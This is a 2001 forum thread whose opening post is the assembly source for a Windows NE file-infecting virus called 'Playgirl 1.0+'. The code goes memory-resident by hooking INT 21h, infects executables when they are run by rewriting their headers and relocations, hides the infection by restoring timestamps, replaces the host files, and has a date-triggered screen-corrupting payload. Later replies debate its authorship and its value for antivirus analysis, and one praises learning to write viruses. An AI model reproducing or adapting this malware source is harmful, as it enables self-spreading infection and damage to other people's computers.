December 6th, 2001, 03:48 AM
A virus code by nakoka
;!!!!!!!!!!!!!!!!!! Virus Run OK Ver Playgirl 1.0+ by nakoka(19age) !!!!!!!!!!!!!!!!!!!!!
.model small, pascal
include c:\masm611\include\win.inc
include c:\masm611\include\cmacros.inc
Extrn __A000H:abs
AddLength equ 800h
WinData DWORD 0 ; Windows reserved data space.
FileHandle DW ?
VTempName db 'v__temp.###',0
VTempHandle dw ?
WriteLength dword ?
NEHeadLength dd ?
DosEXELength dw ?
FileLength dword ?
Old_IP dw ?
StartAdd dw ?
DataLength dw ?
DataAreaOff dw ?
VStartAdd dw ?
No_ModKrnl dw ?
OFF db 1
dw 85 ;kernel!_lopen
;dw offset call_open1+8,offset call_open2+7
dw offset call_open2+7
db 4
dw 84 ;Kernel!_lseek
dw offset call_seek1+9,offset call_seek2+0dh
dw offset call_seek3+0dh,offset call_seek4+9
db 2
dw 81 ;Kernel!_lclose
dw offset CloseAllFile+5,offset CloseFile+5
db 5
dw 349 ;Kernel!_hread
dw offset call_read1+0eh ,call_read2+0eh
dw offset call_read3+0dh ,call_read4+0ch
dw offset call_read5+0dh
db 3
dw 350 ;Kernel!_hwrite
dw offset call_write1+0dh ,call_write2+0ah
dw offset call_write3+0dh
db 1
dw 171 ;Kernel!Allocdstocsalias
dw offset call_allocdstocsalias+2
db 1
dw 83 ;Kernel!create
dw offset call_create+7
db 1
dw 132 ;Kernel!getwinflags
dw offset call_getwinflags+1
db 1 ;Kernel!__A000H
dw 174
dw offset Video_Seg+1
No_OFF dw 9
Vcode_Len dw ?
Next_Seg dd ?
FileName_SEG dw ?
FileName_OFF dw ?
time dw ?
date dw ?
OK db 0
MARK db 0
EndMark db 'ZD'
;######################## Program Start #################
call MyStart
pop bp
sub bp,offset MyStart
push bx
push cx
push di
push si ;Save AppEntry
push es
push ds ;Save
cCall GetWinFlags
test ax,0010h ;WF_STANDARD
jz Pmode ;Not Surport Standard Mode
mov si,offset DataArea
add si,bp
add si,offset Old_IP
mov bp,cs:[si] ;get old ip
jmp EXIT
;jmp call_open1
call CreateDS
mov eax,445a8888h
int 21h ;Test If Resident
cmp eax,'ZDOK'
jz Exit_To_Old ;Already Resident
mov ah,48h
mov bx,AddLength/10h
int 21h ;Alloc Memory
mov es,ax
mov cx,Vcode_Len
mov si,StartAdd
mov di,0
push ds
push cs
pop ds
rep movsb ;copy code
pop ds
mov si,0
mov cx,AddLength
sub cx,Vcode_Len ;copy data
sub cx,50h
rep movsb
mov ax,204h
mov bl,21h
int 31h ;get old INT 21H Vec(P Mode)
mov si,offset quit
mov es:[si+1],dx
mov es:[si+3],cx ;Save old INT 21H
cCall AllocDStoCSAlias,<es> ;Convert to code Segment
mov cx,ax
mov ax,205h
mov bl,21h
mov dx,offset New_WinExec_Entry
int 31h ;set new INT 21H Vec(P Mode)
jmp Exit_To_Old ;Exit
; cCall _lopen,<ds,offset FileName,word ptr READ> ;Open File
; call AfterOpen
mov bp,Old_IP
INVOKE MemFree,ds
pop ds ;
pop es ;
pop si ;
pop di ;;;; Use S-ice for Win,BPX at here,and then EXIT.
pop cx ;
pop bx ;
jmp bp ;
mov OK,0
mov FileHandle,ax ;Save Handle
cmp ax,-1
jnz OpenOK
jmp Error
mov ax,5700h
mov bx,FileHandle
int 21h ;Save Time & Date
mov time,cx
mov date,dx
;cCall GlobalAlloc,<GMEM_FIXED,dword ptr 40h> ;Alloc Memory for DOSEXEherd
INVOKE AllocMem,40h
mov es,ax
cCall _hread,<FileHandle,es,0,dword ptr 40h> ;Read DosEXEHeader
cmp ax,0
jnz ReadOK1
jmp Error
xor si,si
xor ax,ax
mov cx,10
add ax,es:[si]
add si,2
dec cx
jz _AddOK
jmp _Add
cmp ax,'DZ' ;Already ZD
jnz Go_on
jmp CloseFile
mov ax,es:[3ch]
mov DosEXELength,ax
cCall _llseek,<FileHandle,eax,0>
cCall _hread,<FileHandle,es,0,dword ptr 40h> ;Read NE head
cmp ax,0
jnz ReadOK2
jmp Error
cmp es:[0],'EN' ;New EXE File
jnz CloseFile
xor ecx,ecx
mov cx,es:[2ch]
add cx,es:[20h]
mov NEHeadLength,ecx
;mov NEHeadLength,cx
test word ptr es:[0ch],0100000000000000b ;Not DLL
jnz CloseFile
test word ptr es:[0ch],0000100000000000b ;NOT Self Load
jnz CloseFile
test word ptr es:[0ch],1000000000000000b ;NOT DLL
jnz CloseFile
;cCall GlobalFree,<es>
INVOKE MemFree,es
;cCall GlobalAlloc,<GMEM_FIXED,NEHeadLength> ;0+NEHeadLength
INVOKE AllocMem,NEHeadLength
mov es,ax
cCall _llseek,<FileHandle,dword ptr 0,2> ;To File End
shl edx,16
add eax,edx
cmp eax,0fffffh
;jg CloseFile
ja CloseFile ;edit on 96-10-31 7:20 p.m.
mov FileLength,eax
cCall _llseek,<FileHandle,dword ptr 0,0> ;To File Begin
cCall _hread,<FileHandle,es,0,NEHeadLength> ;Read Header
cmp ax,0
jnz ReadOK5
jmp Error
;###########Find if have Kernel ##################
mov bp,DosEXELength
mov ax,1
mov si,es:[bp+28h] ;ofs Module Reference Table
mov bx,es:[bp+2ah] ;ofs Imported Names Table
mov di,es:[bp+si]
add di,bx
cmp es:[bp+di+1],'EK'
jnz NotKrnl
cmp es:[bp+di+2+1],'NR'
jnz NotKrnl
mov No_ModKrnl,ax
jmp After
inc ax
add si,2
cmp si,es:[bp+2ah]
;jl FindKrnl ;if < go on Find
jb FindKrnl ;edit on 96-10-31 7:20 p.m
jmp CloseFile
;################# Write the NAKOKA Mark #################
xor ax,ax
mov si,0
mov cx,9
add ax,es:[si]
add si,2
dec cx
jz __AddOK
jmp __Add
mov bx,'DZ'
sub bx,ax
mov es:[12h],bx ;Write The NAKOKA Mark
;################ Work out Seg Table Offset #############
mov ax,es:[bp+16h] ;CS seg
dec ax
mov bh,8
mul bh ;ax is offset of seg tab
add ax,es:[bp+22h]
mov si,ax ;si is offset of seg tab(byte) from NEhead
;################ Work out Addpages ###################
mov bx,1
mov cl,es:[bp+32h]
shl bx,cl ;bx is logical sector length(byte)
push bx
xor dx,dx
mov ax,AddLength ;300h is addlen
div bx ;ax is addpage
push ax
;################# Modify Gangload ####################
test byte ptr es:[bp+37h],1000b
jz NoGangload
mov dx,es:[bp+si] ;dx is start code segment offset(bytes) from NEhead
cmp dx,es:[bp+38h] ;if ofs<=ofsGangLoad
;jge xy
jae xy ;96-10-31 7:20 p.m.
add es:[bp+38h],ax
cmp dx,es:[bp+38h]
;jl ndye ;if ofs<ofsgangLoad
jb ndye ;96-10-31 7:20 p.m.
mov cx,es:[bp+38h]
add cx,es:[bp+3ah] ;cx=ofsGangLoad+lenGangLoad
cmp dx,cx
;jg ndye ;if ofs>cx
ja ndye ;96-10-31 7:20 p.m.
add es:[bp+3ah],ax
NoGangload: ;Browse RC Table
;################### Modify RC #################
mov cx,es:[bp+26h] ;ofsResidentNameTable
sub cx,es:[bp+24h] ;ofsResource
cmp cx,0
jz norc
mov cx,ax ;cx is addpage
mov di,es:[bp+24h]
add di,bp ;di is offset of RCtab from DosEXEHead
mov cx,es:[di+0] ;rscAlignShift
mov bx,1
shl bx,cl ;bx is 2^rscAlignShift
mov cx,es:[di+4] ;RCcount
mov ax,AddLength ;VLength
xor dx,dx
div bx
add di,0ah
add es:[di],ax
add di,12
dec cx
jz ModifyOneRCOK
jmp Browse
cmp word ptr es:[di],0
mov cx,es:[di+2]
add di,8h
jmp Browse
;################## #######################
pop ax ;codeaddpage
add si,bp ;si is offset of start code segment from MZ
;push word ptr es:[si+8] ;Next Seg
push word ptr es:[si]
push word ptr es:[si+2]
mov di,es:[si+2]
mov VStartAdd,di
;################ Modify Seg Table #############
add es:[si+2],AddLength-50h ;segment length
add es:[si+6],AddLength-50h ;lenMem
mov bx,es:[si] ;bx is start code seg off
mov cx,es:[bp+1ch] ;cx is segmentcount
;sub cx,es:[bp+16h] ;start code segment NO.
mov si,es:[bp+22h] ;seg tab off
mov byte ptr MARK,0
cmp es:[si+bp],bx
jbe XY ;<=
cmp byte ptr MARK,0
jnz NNN ;if frist >
mov dx,es:[si+bp]
mov byte ptr MARK,2
cmp dx,es:[si+bp]
jb ADDSEG ;96-10-31 7:20 p.m.
mov dx,es:[si+bp]
add es:[si+bp],ax
add si,8
dec cx
jz ModifyCodeTabOK
jmp Addofs
push dx ;Next Seg
;################ Modify IP #########################
mov ax,es:[bp+14h]
mov Old_IP,ax ;Save old IP
mov es:[bp+14h],di ;Modify new ip
add di,offset New_WinExec_Entry
; mov New_Winexec_off,di ;
;############### Create Temp File ###################
push es
mov si,FileName_OFF
mov fs,FileName_SEG
mov di,si
cmp byte ptr fs:[si],'\'
jnz findnext
mov di,si
inc si
cmp byte ptr fs:[si],0
jnz go_on_find
cmp di,FileName_OFF
jnz havepath
mov cx,0
push ds
jmp nopath
push ds
mov cx,di
inc cx
sub cx,FileName_OFF
mov si,FileName_OFF
mov di,100h
push ds
pop es
push fs
pop ds
rep movsb
pop ds
push ds
pop es
mov si,offset VTempName
mov cx,12
rep movsb
;cCall _lcreat,<ds,offset VTempName,0> ;Create a Temp file
cCall _lcreat,<ds,100h,0>
mov VTempHandle,ax
cmp ax,-1
jnz OpenTemp
pop es
jmp Error
pop es
;################ Write NE Head ###################
cCall _hwrite,<VTempHandle,es,0,NEHeadLength> ;Write Header
jc Error ;96-10-31 7:30 p.m.
;cCall GlobalFree,<es> ;Free EXEHeader
INVOKE MemFree,es
xor eax,eax
xor ecx,ecx
pop si ;si is Next Seg
pop cx ;ax is offset of start code segment from MZ
pop ax ;cx is segment length
;pop si ;si is next seg
pop di ;bx is logial sector
mul di
shl edx,16
add eax,edx ;eax is 1180h
mov ebx,eax
mov ax,si
mul di
shl edx,16
add eax,edx ;eax is next seg (byte)
push eax
sub eax,ebx
sub eax,ecx
mov Next_Seg,eax
add ebx,ecx
mov eax,NEHeadLength ;!!!!!!!!!
call CopyBlock ;write NEHeadLength to start code seg off
;##################### Write Code ####################
mov eax,Next_Seg ;eax is code seg len + reloc
add eax,AddLength
;cCall GlobalAlloc,<GMEM_FIXED,eax>
INVOKE AllocMem,eax
mov es,ax
mov cx,Vcode_Len
mov si,StartAdd
mov di,0
push ds
push cs
pop ds
rep movsb
pop ds
mov si,0
mov cx,AddLength
sub cx,Vcode_Len
sub cx,50h
rep movsb
cCall _hread,<FileHandle,es,di,Next_Seg> ;di is Reloc Tab off
mov ax,8
mul word ptr es:[di]
add ax,2
mov bp,ax ;di is new reloc off
add bp,di ;di ^
mov bx,No_ModKrnl
mov cx,No_OFF
add es:[di],cx
mov si,offset OFF
mov dx,[si+1+2] ;OFF
push [si+1] ;KRNL NO.
add dx,VStartAdd
cmp [si+1],174
jnz bs_174
mov es:[bp],0105h
jmp gh
mov es:[bp],0103h
mov es:[bp+2],dx
mov es:[bp+4],bx
pop es:[bp+6]
add bp,8
mov dl,[si] ;OFF count
add si,3 ;off
mov di,[si] ;off
mov ax,[si+2] ;next
add ax,VStartAdd
cmp dl,1
jnz cc1
cmp [si+1-3],174
jnz bs_174_1
mov es:[di],0ffffh
jmp zzz
mov ax,0ffffh
mov es:[di],ax
mov word ptr es:[di+2],0
add si,2
dec dl
jnz ccc
dec cx
jnz Modify_Call
mov eax,Next_Seg
add eax,AddLength
cCall _hwrite,<VTempHandle,es,0,eax> ;Write Code
jc Error ;96-10-31 7:30 p.m.
;cCall GlobalFree,<es>
INVOKE MemFree,es
pop eax
mov ebx,FileLength
call CopyBlock ;Write rest Old Data and Code
mov OK,1
mov ax,5701h
mov cx,time
mov dx,date
mov bx,VTempHandle
int 21h ;Save Time & Date
cCall _lclose,<VTempHandle>
cmp ax,0
jnz Error
cCall _lclose,<FileHandle>
cmp ax,0
jnz Error
cmp OK,1
jnz Exit
push ds
mov ah,41h
mov dx,FileName_OFF
mov cx,FileName_SEG
mov ds,cx
int 21h ;Del source file
pop ds
jb Error
mov ah,56h
mov di,FileName_OFF
mov cx,FileName_SEG
mov es,cx
mov dx,100h
int 21h ;Rename file
; mov ah,2
; mov dl,7
; mov ah,2
; mov dl,7
; mov ah,4Ch
; INVOKE DOS3Call ; Exit with return code from app.
push ebx
mov ecx,ebx
sub ecx,eax
mov WriteLength,ecx
cCall _llseek,<FileHandle,eax,0> ;eax is F1begin
;cCall GlobalAlloc,<GMEM_FIXED,WriteLength>
INVOKE AllocMem,WriteLength
mov es,ax
cCall _hread,<FileHandle,es,0,WriteLength>
cmp ax,0
jnz ReadOK4
pop ebx ;
pop ax ;call ip Adjust Stack
jmp Error
cCall _hwrite,<VTempHandle,es,0,WriteLength>
jc Error ;96-10-31 7:30 p.m.
;cCall GlobalFree,<es>
INVOKE MemFree,es
pop eax
INVOKE AllocMem,200h ;Alloc DS
mov es,ax
mov si,offset DataArea
add si,bp
push si ;DataAreaOff
mov di,0
mov cx,offset _EndMark
sub cx,offset _WinData
push cx ;DataLength
mov ax,cs
mov ds,ax
rep movsb
mov ax,es
mov ds,ax
mov [StartAdd],bp
pop DataLength ;Save DataLength
;pop K_BModule
pop DataAreaOff
mov ax,offset DataArea
sub ax,offset __astart ;eax is Vcode length
mov Vcode_Len,ax
;cCall MessageBeep,<-1>
jmp Exit
cmp eax,445a8888h
jnz de_4c
mov eax,'ZDOK'
;####################### Modify Screen ########################
cmp ah,4ch
jnz Check
; sub sp,20h
; mov bp,sp
; ;cCall GetActiveWindow
; ;cCall GetTopWindow,<ax>
; ;cCall GetNextWindow,<ax,2>
; cCall GetFocus
; mov [bp+16],ax ;hwnd
; cCall GetDesktopWindow
; cCall GetWindowDC,<ax>
; mov [bp+18],ax ;myhdc
; cCall GetWindowRect,<word ptr [bp+16],ss,bp>
; mov ax,[bp+6]
; sub ax,[bp+2] ;di=bottom - top ------>y
; shr ax,1
; inc ax
; mov [bp+20],ax ;
; mov bx,[bp+4]
; sub bx,[bp] ;si=right - left ----->x
; mov [bp+22],bx
; xor di,di
; xor si,si
; mov ax,[bp+4] ;right
; sub ax,si
; mov bx,[bp+6] ;bottom
; sub bx,di
; push ax
; push bx
; cCall GetPixel,<word ptr [bp+18],ax,bx> ;[
; mov [bp+8],dx
; mov [bp+10],ax ;color a
; mov ax,[bp] ;left
; add ax,si
; mov bx,[bp+2] ;top
; add bx,di
; push ax
; push bx
; cCall GetPixel,<word ptr [bp+18],ax,bx> ;]
; mov [bp+12],dx
; mov [bp+14],ax ;color b
; pop bx
; pop ax
; cCall SetPixel,<word ptr [bp+18],ax,bx,word ptr [bp+8],word ptr [bp+10]>
; pop bx
; pop ax
; cCall SetPixel,<word ptr [bp+18],ax,bx,word ptr [bp+12],word ptr [bp+14]>
; inc si
; cmp si,[bp+22]
; jl LOOPX
; inc di
; cmp di,[bp+20]
; jl LOOPY
; add sp,20h
push ax
push cx
push si
push es
mov ah,2ah
int 21h
cmp dh,11 ;Dec
jnz qqqq
cmp al,0 ;Sunday
jz Check_time
cmp al,6 ;Saturday
jnz qqqq
mov ah,2ch
int 21h
cmp ch,22 ; >22:00
;jl qqqq
ja qqqq ;96-10-31 7:20 p.m.
mov ax,__A000H
mov es,ax
mov cx,8000h-16
mov si,0
mov ax,es:[si+16]
mov es:[si],ax
add si,2
loop de
pop es
pop si
pop cx
pop ax
jmp quit
;####################### COPY MY SELF ####################
cmp ah,4bh
jnz quit
push eax
push ebx
push ecx
push edx
push si
push di
push bp
push ds
push es
push fs
push gs ;4*4+7*2=30 Stack-30 bytes
push ds
push dx
call V_Begin
pop bp
mov ax,offset V_Begin
sub bp,ax
call CreateDS
pop dx
pop fs ;fs:dx is lpszFileName
mov FileName_SEG,fs
mov FileName_OFF,dx
cCall _lopen,<fs,dx,word ptr READ>
call AfterOpen
;cCall GlobalFree,<ds>
INVOKE MemFree,ds
pop gs
pop fs
pop es
pop ds
pop bp
pop di
pop si
pop edx
pop ecx
pop ebx
pop eax
db 0eah
dd ?
;################### Some Function #######################
AllocMem PROC ,number:DWORD
mov ah,48h
mov ebx,number
mov cx,bx
shr ebx,4
shl cx,4*3
cmp cx,0
jz Call21
inc bx
int 21h
AllocMem endp
MemFree PROC ,selector:WORD
mov ah,49h
mov bx,selector
mov es,bx
int 21h
MemFree endp
_WinData DWORD 0 ;4 Windows reserved data space.
_FileHandle DW ? ;2
_VTempName db 'v__temp.###',0 ;12
_VTempHandle dw ? ;2
_WriteLength dword ? ;4
_NEHeadLength dd ? ;2
_DosEXELength dw ? ;2
_FileLength dword ? ;4
_Old_IP dw ? ;2
_StartAdd dw ? ;2
_DataLength dw ? ;2
_DataAreaOff dw ? ;2
_VStartAdd dw ?
_No_ModKrnl dw ?
_OFF db 1
dw 85 ;kernel!_lopen
;dw offset call_open1+8,offset call_open2+7
dw offset call_open2+7
db 4
dw 84 ;Kernel!_lseek
dw offset call_seek1+9,offset call_seek2+0dh
dw offset call_seek3+0dh,offset call_seek4+9
db 2
dw 81 ;Kernel!_lclose
dw offset CloseAllFile+5,offset CloseFile+5
db 5
dw 349 ;Kernel!_hread
dw offset call_read1+0eh ,call_read2+0eh
dw offset call_read3+0dh ,call_read4+0ch
dw offset call_read5+0dh
db 3
dw 350 ;Kernel!_hwrite
dw offset call_write1+0dh ,call_write2+0ah
dw offset call_write3+0dh
db 1
dw 171 ;Kernel!Allocdstocsalias
dw offset call_allocdstocsalias+2
db 1
dw 83 ;Kernel!create
dw offset call_create+7
db 1
dw 132 ;Kernel!getwinflags
dw offset call_getwinflags+1
db 1 ;Kernel!__A000H
dw 174
dw offset Video_Seg+1
_No_OFF dw 9
_Vcode_Len dw ?
_Next_Seg dd ?
_FileName_SEG dw ?
_FileName_OFF dw ?
_time dw ?
_date dw ?
_OK db 0
_MARK db 0
_EndMark db 'nakoka' ;2
none dword 30h dup(?) ;+
end __astart ; start address
December 6th, 2001, 03:54 AM
Hey...you...question...just what are you trying to do with this?
I don't think anybody really cares about 'a virus code' on here.
And it's too bad that won't work on my unix box.
We the willing, led by the unknowing, have been doing the impossible for the ungrateful. We have done so much with so little for so long that we are now qualified to do just about anything with almost nothing.
December 6th, 2001, 04:00 AM
Senior Member
I'm sure some people won't agree with me here, but....
It's cool that you share your assembler code with us (though I haven't copied it yet to test it on my home system that is not and never will be attached to the internet...........)
One question though,
Why did you leave in all of the commented code (as under the section "Modify Screen")
Actually two questions...
Did you actually write this? (Your english is usually a little off is why I ask) The comments are pretty understandable english.
(No I'm not being sarcastic, just curious)
I don't code viruses, but I collect them to analyze their code. Just one more for the "Quarantine Box" (The red floppy disk box I keep my virus disks in)
You should really put your coding skills to good use instead of wasting them on viruses and hacking into web sites. You could make something of yourself it you'd clean up your act. (That I'm sure many here will agree with me on)
Happy Hacking (but only the legal kind from now on, right?)
Warfare is the Way of deception.
-Sun Tzu \"The Art of War\"
December 6th, 2001, 05:14 AM
December 6th, 2001, 06:30 AM
if this were your code... i would have a small amount of respect for you.... but i don't think it is. i still wouldn't care too much though, cause you aren't doing anything of value....
time to wait for the "my-english-is-not-so-good" reply
December 6th, 2001, 06:40 AM
hmmm well i think i would give this guy a thank you.. considering that i can annalyze this code and make some kind of anti-virus for it..
i get rid of trojans manually... well atleast i try to get rid of them manually w/o using an anti-virus..
how i do this is by annalyzing how the trojan works.. and u cannot always have an antivirus in a pc all the time.. as i have experienced in helping other people..
this viral code may help me learn on how i can also get rid of a virus manually or create some sort of anti-virus for it from the top of my head..
i know it seems impossible but i learn quick and hell i already removed a lot of trojans from different computers manually w/o the aid of virus scanners...
December 6th, 2001, 07:26 AM
I agree with Sonic - studying code is an excellent way to learn, and furthermore, I'm just curious. If the code was written by him, I frankly don't care. Those messages about 'me finds hole' and 'I hacked page' ... oh well... just another idiot, right?
December 6th, 2001, 07:41 AM
nakoka.... from what virus did you extract this code??
and i want to know if this work is really yours...
December 6th, 2001, 07:42 AM
I will try my best to learn to about HACK and VIRUS. Because I am a clever Chinese boy.HAHA~~~~Thankyou!
December 6th, 2001, 07:54 AM
hmmm.. nakoka.. im not saying that im encouraging you to keep on doing illegal activities.. but what i am saying is that im encouraging you to share your knowledge with us..
im just a curious hacker who wanst to make a solution for every problem.. and i hope you are too..
coz i promise you.. if u make a problem.. i sure hell am gonna make a solution for it.. :P heheh
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